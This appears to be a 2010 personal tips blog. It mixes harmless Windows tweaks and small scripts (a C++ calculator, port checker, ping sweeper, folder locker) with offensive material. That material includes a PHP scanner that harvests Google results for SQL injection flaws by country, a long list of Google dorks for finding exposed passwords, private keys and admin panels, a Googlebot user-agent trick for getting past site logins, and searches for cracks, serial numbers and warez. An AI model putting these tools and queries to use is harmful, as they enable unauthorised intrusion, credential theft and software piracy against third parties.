Monday, December 27, 2010

Calculator (C++)

#include "stdafx.h"
#include <iostream>
using namespace std;

void plus();
void minus(); 
void mult();     //Here are the declerations of the functions.
void dev();
void exit();


int main()
{
    int sth=0;
   
    while(1) //The while loop,will execute again and again the stuff below(but only code which is in it's scopes!)
    {
      cout << "Press 1 for Addition" << endl;
      cout << "Press 2 for Subtraction" << endl ;    //Here are the senteces about calculations..
      cout << "Press 3 for Multiplication" << endl;
      cout << "Press 4 for Devision" << endl ;
     


int choice;
    cin >> choice;
   
   
    switch (choice) //The switch statement,is like the if statement.It will run the cases below.
    {
   
case 1:
    choice = 1;
        cout << "->Addition\n";
                plus();
                    break;
   
   
   
case 2:
    choice = 2;
        cout << "->Subtraction\n";  
                minus();
                    break;



case 3:
    choice = 3;
        cout << "->Multiplication\n";  
                mult();
                    break;                   
   
   
   
   
case 4:
    choice = 4;
        cout << "->Devision\n";
                dev();
                    break;


}
continue; //Here the loop will stop and run again from the beginning.

}
       
    char f;
    cin >> f;
    return 0;

}


void plus()  //Here are the function's definitions.
{
    int my[2]; //The array here,will make 2 new integer variables,for later use.

    cout << "Put 1st number:  ";
   
    cin >> my[0]; //Int the 1st array here will be put the 1st number.
   
    cout << "Put 2nd number:  "  ;
   
    cout << endl;

    cin >> my[1]; //And here the 2nd.

    cout << "The result is : ";
   
    cout << my[0] + my[1] << endl; //This will print out the result.
   
    exit(); //And at the end the "exit" function will be called!

}

void minus()
{
   
    int my[2];

    cout << "Put 1st number:  ";
   
    cin >> my[0];
   
    cout << "Put 2nd number:  " << endl ;
   
    cin >> my[1];
   
    cout << "The difference is : ";
   
    cout << my[0] - my[1]<< endl ;

    exit();

}

void mult()
{
    int my[2];

    cout << "Put 1st number:  ";
   
    cin >> my[0];
   
    cout << "Put 2nd number:  " << endl ;
   
    cin >> my[1];
   
    cout << "The product is : ";
   
    cout << my[0] * my[1] << endl ;

    exit();

}

void dev()
{
    int my[2];

    cout << "Put 1st number:  ";
   
    cin >> my[0];
   
    cout << "Put 2nd number:  " << endl ;
   
    cin >> my[1];
   
    cout << "The quotient is : ";
   
    cout << my[0] / my[1] << endl;
   
    exit();

}                                                                           

void exit()
{
    cout << "                                                      Press 0 to Exit" << endl ;
   
    int quit;
            cin >> quit;
            if (quit == 0)
            {
            exit(0);
            }
 
}


Check open port (php)

 Hmm simply save it *.php
It will check n display opened ports

<html><head><title>Check Open Ports</title></head>
<body>
<center>
<br><br>
<h1>You IP is:<br><font color='blue'><?php echo $_SERVER['REMOTE_ADDR'];?></font></h1>
<br>
<form action="" method="post">
<h2>Enter ip adress to check: <h2><br><input type="text" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR'];?>" size="30"/><br><br>
<h2>Enter port to check: <h2><br><input type="text" name="port" size="20"/><br><br>
<input type="submit" value="check"/>
</form> 
</center>


<?php
$ip=$_POST["ip"];

$port = $_POST["port"];
if ($ip && $port){
$fp = @fsockopen($ip,$port,$errno,$errstr,5);
if(!$fp)
{
echo " <center><h3>Destination IP is <br><font color='blue'>".$ip."</font><br>Cannot connect to server  <br> Port <font color='red'>".$port." </font>is<br><h2> <b><font color='red'>Closed</b></h2></h3></center>";
}

else{
echo "<center><h3>Destination IP is <br><font color='blue'>".$ip."</font><br>Connect was successful <br> Port <font color='green'>".$port." </font> is<br><h2> <b><font color='green'>Open</b></h2></h3></center>";
fclose($fp);
}
}

?>
</body></html>


Sunday, December 26, 2010

How to close open port

So i've been looking for a while on just how to close a port on a computer. I simply
couldn't find a way. Well, i finally found it. This'll only work for windows users (unless
your unix version OS has netsh).
it's actually quite simple. here's the command for it:
netsh firewall delete portopening TCP portnumber

it's that simple. Simply go to START -> RUN -> and type in that command up there,
and it'll close it for you.
or, you can also open up command prompt (START -> RUN -> CMD) and type in "netsh"
without the quotes to get to your windows firewall settings.
however, since i'm such a nice guy, i wrote it all out in a vbs script for you so that it's
automatically runable. as well as a batch script. so here you are fellas:

.VBS Script
set ss = createobject("wscript.shell")
set ws = wscript
dim PORT
PORT = InputBox("Enter the port you wish to close:")
ss.run "netsh.exe"
ws.sleep 1000
ss.sendkeys "firewall delete portopening TCP " & PORT
ss.sendkeys "{enter}"
ws.sleep 500
'ss.sendkeys "exit"
'ss.sendkeys "{enter}"



.BAT Script
@echo off
title Port Closer
echo Port Closer
echo.
set /p port=Type the port number you wish to close here:
netsh firewall delete portopening TCP %port%
msg /w * Port %port% has been closed.
exit


Sunday, December 19, 2010

Way to show your IP address

To Get And Show The Ip Via Javascript

To show the ip via JavaScript
var ip= '<!--#echo var="REMOTE_ADDR"-->';
document.write("Your IP Address is :"+ip+" ");

To show IP via ASP
request.ServerVariables("REMOTE_ADDR")


TO SHOW IP VIA PHP
<?
$remote_address = getenv("REMOTE_ADDR");
echo "Your IP address is $remote_address.";
$browser_type = getenv("HTTP_USER_AGENT");
echo "You are using $browser_type.";
?>


How To optimize DSL-CABLE connection speed

First, u need to goto Start, then run. Type in regedit in the box. Next, goto the folder HKEY_LOCAL_MACHINE\System\CurrentControlSet\VxD\MSTCP
Now, find the string DefaultRcvWindow . Now, edit the number to 64240 then restart your computer. There you go. High speed cable modem now with out dloading a program. Original value is 373360


Tuesday, December 14, 2010

Free Access To Websites Without Registering

Go to

-http://bugmenot.com/

and type the URL of the website you want to log into.
Examples:

-http://www.nytimes.com/, -http://www.winnetmag.com/
etcetera. It will success if there are have a submitted accounts one for your target site.

Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+

-http://www.googlebot.com/bot.html

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

-http://www.chrispederick.com/work/firefox/useragentswitcher/
and add the Googlebot user agent.

Have fun, Dead Dreamer!

-]Edit[- Now this kicks ass, was just browsing entire forum without even needing to login to view restricted areas, and it works on other sites
And no, you cant access the hidden forums either, already tried that


Finding Missing Files From A Release

Have you ever downloaded a game/app/movie/... and when it was finished, you find out that are some missing files or corrupt ones?
Well here's a way to find those files:
--> www.incomplete.me.uk

This is a service that works through irc (so mirc (or another) must be installed to use it).
You go on the specific channel (manually or by clicking one of the direct links on the site) and then "ask" for the specific file.
When there's someone out there who has it, it will be send to you automatically
If not, the file request shall be put on a queu list untill someone that has it, has sent it to the person that requested it.
!!! Obey the rules though, if not you can be banned from the channel and in severe cases your provider can be banned so others won't be able to use this !!!

I hope this can help out some people here, who have experienced/will experience this


Friday, December 10, 2010

SQLi scanner by country

  1. <?php
  2.    
  3.    
  4.     set_time_limit(0);
  5.    
  6.     $vuln = 0;
  7.     $not_vuln = 0;
  8.     $total = 0;
  9.    
  10.     $country = array('AF','AL','DZ','AS','AD','AO','AI','aku','AG','AR','AM','AW','AU',
  11.                     'AT','AZ','BS','BH','BD','BB','BY','BE','BZ','BJ','BM','BT','BO','BA','BW','BV','BR','IO','BN','BG','BF','BI',
  12.                     'KH','CM','CA','CV','KY','CF','TD','CL','CN','CX','CC','CO','KM','CG','CD','CK','CR','CI','HR','CY','CZ','DK',
  13.                     'DJ','DM','DO','TL','EC','EG','SV','GQ','ER','EE','ET','FK','FO','FJ','FI','FR','GF','PF','TF','GA','GM','GE',
  14.                     'DE','GH','GI','GR','GL','GD','GP','GU','GT','GN','GW','GY','HT','HM','HN','HK','HU','IS','IN','ID','IQ','IE',
  15.                     'IL','IT','JM','JP','JO','KZ','KE','KI','KW','KG','LA','LV','LB','LS','LR','LY','LI','LT','LU','MO','MK','MG',
  16.                     'MW','MY','MV','ML','MT','MH','MQ','MR','MU','YT','MX','FM','MD','MC','MN','MS','MA','MZ','NA','NR','NP','NL',
  17.                     'AN','NC','NZ','NI','NE','NG','NU','NF','MP','NO','OM','PK','PW','PS','PA','PG','PY','PE','PH','PN','PL','PT',
  18.                     'PR','QA','RE','RO','RU','RW','KN','LC','VC','WS','SM','ST','SA','SN','CS','SC','SL','SG','SK','SI','SB','SO',
  19.                     'ZA','GS','KR','ES','LK','SH','PM','SR','SJ','SZ','SE','CH','TW','TJ','TZ','TH','TG','TK','TO','TT','TN','TR',
  20.                     'TM','TC','TV','UG','UA','AE','GB','US','UM','UY','UZ','VU','VA','VE','VN','VG','VI','WF','EH','YE','ZM','ZW');
  21.    
  22.     $bug = array(
  23.         'You have an error in your SQL','Division by zero in',
  24.         'supplied argument is not a valid MySQL result resource in',
  25.         'Call to a member function','Microsoft JET Database',
  26.         'ODBC Microsoft Access Driver',
  27.         'Microsoft OLE DB Provider for SQL Server',
  28.         'Unclosed quotation mark',
  29.         'Microsoft OLE DB Provider for Oracle',
  30.         'Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect',
  31.         'Incorrect syntax near'
  32.     );
  33.    
  34.     if(!$argv[1]) {
  35.         print "[%] Usage: $argv[0] <dork> <country>n";
  36.         print "[%] Example : $argv[0] inurl:news.php?id= 3nn";        
  37.         print "Country";
  38.         print "t1 - All Searchn";
  39.         print "t2 - Search in Malaysia Onlyn";
  40.         print "t3 - Search in F*** Israel n";
  41.         exit;
  42.     }
  43.    
  44.     if (!$argv[2] or !(in_array($argv[2], $country))) {
  45.         $goo = "http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N";
  46.     } else {
  47.         foreach ($country as $i) {
  48.             if ($argv[2] == $i)
  49.                 $goo = "http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N&cr=country$i";
  50.         }
  51.     }
  52.     for($i = 0; $i <= 900; $i += 100) {
  53.         $fp = @file_get_contents($goo);
  54.         @preg_match_all("/<h3 class=(.*?)><a href="(.*?)" class=(.*?)>/", $fp, $links);
  55.         $url[] = $links[2];
  56.     }
  57.    
  58.     print "[@] Pencarian dimulakan...n";
  59.     print "[@] Sekarang mencari Vulnerablen";
  60.     foreach($url as $key) {
  61.         foreach($key as $value) {
  62.             $fp = @file_get_contents($value."'");
  63.             foreach($bug as $error) {
  64.                 if(@preg_match("/$error/", $fp)) {
  65.                     print "[#] Manggsa >> $value'n";
  66.                     $vuln++;
  67.                 } else {
  68.                     $not_vuln++;
  69.                 }
  70.                 $total++;
  71.             }
  72.         }
  73.     }
  74.    
  75.     print "[@] Scanning Selesain";
  76.     print "[%] Keputusann";
  77.     print "[-] JUMLAH Vulnerable: $vulnn";
  78.     print "[-] JUMLAH Bukan Vulnerable : $not_vulnn";
  79.     print "[-] Jumlah Website scanned : $totaln";
  80. ?>


View hidden file using Dos

at command prompt just type
dir /ah
if the list is too long u can use
dir /ah/p/w


Change tumbnail size and quality

If any of you out there like to use the thumbnail view, especially for browsing through photos and images, it can become a bit of a drain on your system. It is possible to lower the thumbnail size and quality by editing the following registry keys.

Open the registry and navigate to :

HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer

Create a new DWORD value called ThumbnailSize, and set the value between 32 and 256.

And/or create another DWORD value called ThumbnailQuality, and set the value between 50 and 100.

Key Details :

USER Key: [HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer]
Value Name: ThumbnailSize
Data Type: REG_DWORD (DWORD Value)
Data Value: 32 - 256

USER Key: [HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer]
Value Name: ThumbnailQuality
Data Type: REG_DWORD (DWORD Value)
Data Value: 50 - 100


Monday, December 6, 2010

[Movie] Jangan Pandang Belakang Congkak 2 [2010] DVDrip [RMVB & MKV]

"Setelah berjaya memulihkan Punai, Asmat dan Johan serta berjaya menewaskan Mustika dalam JPBC yang lalu, Pak Mor yang cedera itu terus menuju ke anak sungai. Di tepi sungai, Pak Mor duduk bersila dan mula membaca jampi menteranya. Semakin lama semakin laju Pak Mor membaca jampi manteranya. Serentak angin mula bertiup. Semakin lama semakin kencang angin bertiup mengikut kelajuan Pak Mor membaca jampi manteranya. Tiba-tiba tubuh Pak Mor mula mengelupur. Mulutnya masih kumat kamit membaca jampi manteranya. Tiba-tiba Pak Mor kejang dan serentak dengan itu satu gumpalan asap keluar dari tubuh Pak Mor dan asap itu muncul Mustika. Setelah Mustika keluar dari tubuh Pak Mor, Pak Mor kembali pulih seperti sedia kala. Rupa-rupanya Pak Mor ada hubungan dengan Mustika dan mereka telah berpakat untuk mengambil semua harata dan saka-saka Pak Sudir setelah kematian Pak SudiR" ...


Mediafire :





Delete files from the recent file list in windows

This tip requires a change to the Windows Registry. Please see the MSFN Guide "Backup Your Registry" if you are new to the Windows Registry.

Windows Media Player (WMP) is a built-in application that allows you to play multimedia files. Like many other applications, WMP remembers the most recently played files and displays them in the Recent File List under the File menu. This feature is useful if you regularly play certain files, but you may want to clear the list if you share the computer and a user account or create archives and CDs.

There are two ways you can clear the list:

I. The ClearMRU.exe Utility is available for free in the Windows Media Player Bonus Pack from Microsoft, but Microsoft does not support this tool.

II. You can also manually delete the list through the Windows Registry:

1. Start the Windows Registry Editor, regedit.exe, by typing regedit in the Windows Run Command Line.

2. Go to HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList.

3. Delete the RecentFileList subkey.

4. If you've also streamed content from the Internet, you can delete the RecentURLList subkey.

5. Exit the Registry Editor.

6. Restart the computer.

To keep certain files in the list, don't delete the entire key. Deleting individual entries within the key will get rid of the files that you no longer want in the Recent File List.


Ping sweeper - batch script

This simple ping sweeper to a giving range of IP..


@echo off  
cls
@color 0A  
echo  
echo *************************  
echo *  @pih ping sweeper    *  
echo *************************    
echo.       
for /l %%a in (1,1,255) do (  
ping -n 1 10.19.127.%%a | find "Reply" 

Simply copy and paste in notepad & save it as ping_sweeper.bat


Friday, December 3, 2010

Windows 7 Themes - Spooky


Themes name  : Spooky
Size                : 9MB
Year               : 2010
(Mediafire)
Download: Win7 Themes - Spoky 


Thursday, December 2, 2010

Making a *.cue file

open up notepad n type (or copy n paste) this:

FILE "NAME.BIN" BINARY
TRACK 01 MODE1/2352
INDEX 01 00:00:00

change the word NAME.BIN inside the quotation marks to whatever the name of your BIN file is.......
when you go to 'save as'
in the 'files of type' ..click on the arrow n change from text document (*.txt) to 'all files'
n name it the same as the bin file
for instance..if the bin file is anything.bin
save your cue file as anything.cue
after ya save it copy n paste the file ta the folder with your bin file


Way to find serial number at Google

let's pretend you need a serial number for windows xp pro.
in the search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.

or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR
just try it out, it's very quick and it works nicely..


Create A Huge File

You can create a file of any size using nothing more than what's supplied with Windows. Start by converting the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits—000F4240.

Now open a command prompt window. In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000, or XP enter CMD instead.

Enter the command DEBUG BIGFILE.DAT and ignore the File not found message.

 Type RCX and press Enter. Debug will display a colon prompt. Enter the last four digits of the hexadecimal number you calculated (4240, in our example).

Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example).

 Enter W for Write and Q for Quit. You've just created a 1-million-byte file using Debug. Of course you can create a file of any desired size using the same technique.


Wednesday, December 1, 2010

Create An Ftp Server On Your Pc With Serv-u

Requirements:
Serv-U
No-IP.com Website


Quote:
Step 1. Getting a static IP address.
Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it’s easier keeping up-to-date. Imagine having to change all of your setting every time your IP changed. With No-IP, the No-IP service runs in background on your computer and updates your current IP address with your FTP server’s URL (for example, you get ftp://rkchoolie.serveftp.com). Second reason, you don’t want your IP address posted out there for everyone to see.

1. Go to www.No-IP.com to create a new user account.
2. Fill in the information that is required and the click Register button.
3. Your account has now been created and your account password has been emailed to you.
4. Check your email mailbox and wait for the mail that contains your password
5. Go back to www.No-IP.com and type your email address and password to login to your account.
6. Once in your account, click on Add a host in the left menu
7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)
8. Check Allow Wildcards and click the Submit button
9. You now have your static address (example: rkchoolie.serveftp.com)
10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client
11. Once downloaded, install the software and type in your email address and password when asked.
12. Finally tick the checkbox near your static address.

You now have a static web address .


Quote:
Step 2. Installing and setting the FTP server
1. Install Serv-U 4.0.
2. Start Serv-U and use the wizard to setup your ftp.
3. Click next until you're asked for an IP address, leave it blank and then click next.
4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.
5. You are asked if you want to allow anonymous access, select No and then click next.
6. You are then asked to create a named account, check yes and then click next.
7. Type in the user name you wish for this account (example: Harrie) and click next.
8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special characters. Then click next.
9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.
10. Select yes to lock this account to the Home directory. You want to do this so that the user can not go any further up that his home directory. Click next.
11. The account is now set so click finish.

Quote:
Step 3. Configuring user accounts
1. In the left tree-menu, select the account you've just created and then click on the General tab.
2. Check Hide ‘Hidden’ Files.
3. Check Allow only and enter the number one in the box.
4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usually have mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.
5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
6. Now, click on the Dir Access tab.
7. You should see the home folder in there. Highlight it and make your permissions.
8. If you only want users to be able to download check only Read, List, & Inherit.
9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, & Inherit. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.
10. If there is a folder that you don’t want anyone to have access to, but it is inside the home folder, then click the add button and then select that folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this no access folder to be listed at the very top.
11. There are many other different sets of permissions you can play with. I just covered your basics.
12. Your server is now set!
13. Try logging on with the username and password and see if it works.


Samsung Wave s8500 sicret code

*#1234# - Shows Firmware version.
*#197328640# - Internal Settings
*2767*3855# - Hard Reset

Please be careful while using these codes. Changing values without knowing what they are might make your phone unstable.

*#197328640# - Secret Menu.
*#0228# - Battery Info

*#0*# - LCD test

*#1111# S/W Version
*#1234# Firmware Version
*#2222# H/W Version

*#197328640#

This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

For increasing music volume:

Type *#197328640#
Click the button 5 ( Audio )
Click the button 2 ( AP, Volume Config)
Click on the button 2 (EAR Config )
Click the button 1 (volume PM) - to increase the volume of music files or the 5 key (FM Radio volume ) - Radio
We can see the 7 lines (0-6 ) , we can increase the value of
all lines (these are the lines that define the level at each
support ), you can change any of them or increase only
last value of 58dB to 75dB and 100db max .

To enter double digit, for 0 line press 0 on the number pad it will say write on the top right hand corner on the screen. just tap on the bar 3 to 4 times quickly below the number key pad and then another keypad should open. enter desired number and press ok twice...done.

-------------
*#7465625#

This code can be used to check the status of Sim Lock and Network Lock.
-------------


Lock folder batch script

Just copy all code and paste it in notepad..
Save it as anything.bat

It will create a folder call "private" and there is place that you put your files

Quote:
Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Anda Pasti Untuk Kunci Folder ini?(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder dikunci
goto End
:UNLOCK
echo =====Folder Locked v.1=====
echo Masukkan Password Untuk Unlock Folder>
set/p "pass=>"
if NOT %pass%== abc123 goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked Berjaya
goto End
:FAIL
echo Password Salah la Encik
goto end
:MDLOCKER
md Sulit
echo Folder Sulit Berjaya Dihasilkan
goto End
:End


Go to windows update annonymously

Launch good ol' Regedit.
Go down to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion.
Look for a value named RegDone. If it isn't there create a new value with that name.
Right click the new value and choose Modify. Make the value 1.
Close Regedit and
Enjoy!


Find Ftp's The Easy Way

I use google cuz its the best search engine en everyone can acces .
The easiest search quote is "index of ..."
Some kind of examples are:
index of ftp/ +mp3
index of ftp/ +divx
index of ftp/ +"whateveryouwant"
Google has many operators that should help you to specify your search
USE EM
There are also lots of advanced operators available
here are a few:
cache:
link:
related:
info:
stocks:
site:
allintitle:
intitle:
allinurl:
inurl:
eg:
allintitle: "index of ftp/mp3"
try to combine things and maybe u'll find something


How to download mp3's & software with google

How to :?

This Tip For Mp3 Searching On Google,
go to google copy and paste in
?intitle:index.of? mp3

and after mp3 put in an artist or album or whatever and hit enter... what you get is lists of downloadable mp3s
eg:

?intitle:index.of? mp3 santana

Another trick:
Use the following

inurl:microsoft filetype:iso

You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

Another trick:

http://www.google.com/ie?q=parent-directory+"Warez"+exe+OR+zip+OR+rar+OR+gzip+OR+tar+OR+bzip&num=100


Unload cache DLL file to free up memory

How to :?

Windows Explorer caches DLLs (Dynamic-Link Libraries) in memory for a period of time after the application an using them has been closed. Which in some cases can be an waste of memory. To stop WinXP from always caching these DLL files, create the new registry key below.
Open up the Registry and navigate to :
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer
Create a new sub-key named 'AlwaysUnloadDLL' and set the default value to equal '1' to disable Windows caching the DLL in memory.
Restart Windows for the change to take effect


Google Crack Search

This is the tips :

just type crack: app name
example: crack: flashget 1.6a

http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=crack%3A+flashget+1.6a


Finding Missing Files From A Release

I hope this hasn't been submitted before, but i did a search and didn't find anything so here goes.
Have you ever downloaded a game/app/movie/... and when it was finished, you find out that are some missing files or corrupt ones?
Well here's a way to find those files:
--> http://www.incomplete.me.uk/
This is a service that works through irc (so mirc (or another) must be installed to use it).
You go on the specific channel (manually or by clicking one of the direct links on the site) and then "ask" for the specific file.
When there's someone out there who has it, it will be send to you automatically
If not, the file request shall be put on a queu list untill someone that has it, has sent it to the person that requested it.
!!! Obey the rules though, if not you can be banned from the channel and in severe cases your provider can be banned so others won't be able to use this !!!
I hope this can help out some people here, who have experienced/will experience this


Google Hacking code

admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors |

administrators | users) "# -FrontPage-"
inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg
-site:sourceforge.net
"parent directory" +proftpdpasswd
"
Duclassified" -site:duware.com "DUware All Rights
reserved"
"
duclassmate" -site:duware.com
"
Dudirectory" -site:duware.com
"
dudownload" -site:duware.com
"
Elite Forum Version *.*"
"
Link Department"
"sets mode: +k"
"your password is" filetype:log
"
DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration"
-intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd"
database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername"
+intext:"defaultpassword"
filetype:reg reg +intext:â?�WINVNC3â?�
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" |
"values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"
EZGuestbook"
intext:"
Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend
Scripting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp |
voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of
intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" |
inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage
-"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual
Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000
-bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial
-download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial
-download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete"
"Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin
-site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session
with" OR intitle:"Data Frame - Browser not HTTP 1.1
compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news"
-demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID"
-site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform"
inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the
management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
"
CuteNews" "2003..2005 CutePHP"
"
DWMail" password intitle:dwmail
"
Merak Mail Server Software" -.gov -.mil -.edu
-site:merakmailserver.com
"
Midmart Messageboard" "Administrator Login"
"
Monster Top List" MTL numrange:200-
"
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail Development
Team"
"SysCP - login"
"This is a restricted Access Server" "Javascript Not
Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an
administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login"
-inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer
Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our
website. Please authenticate yourself to continue."
"You have requested to access the management functions"
-.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwt
hreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo")
-family
(intitle:"WmSC e-Cart
Administration")|(intitle:"WebMyStyle e-Cart
Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp)
-site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
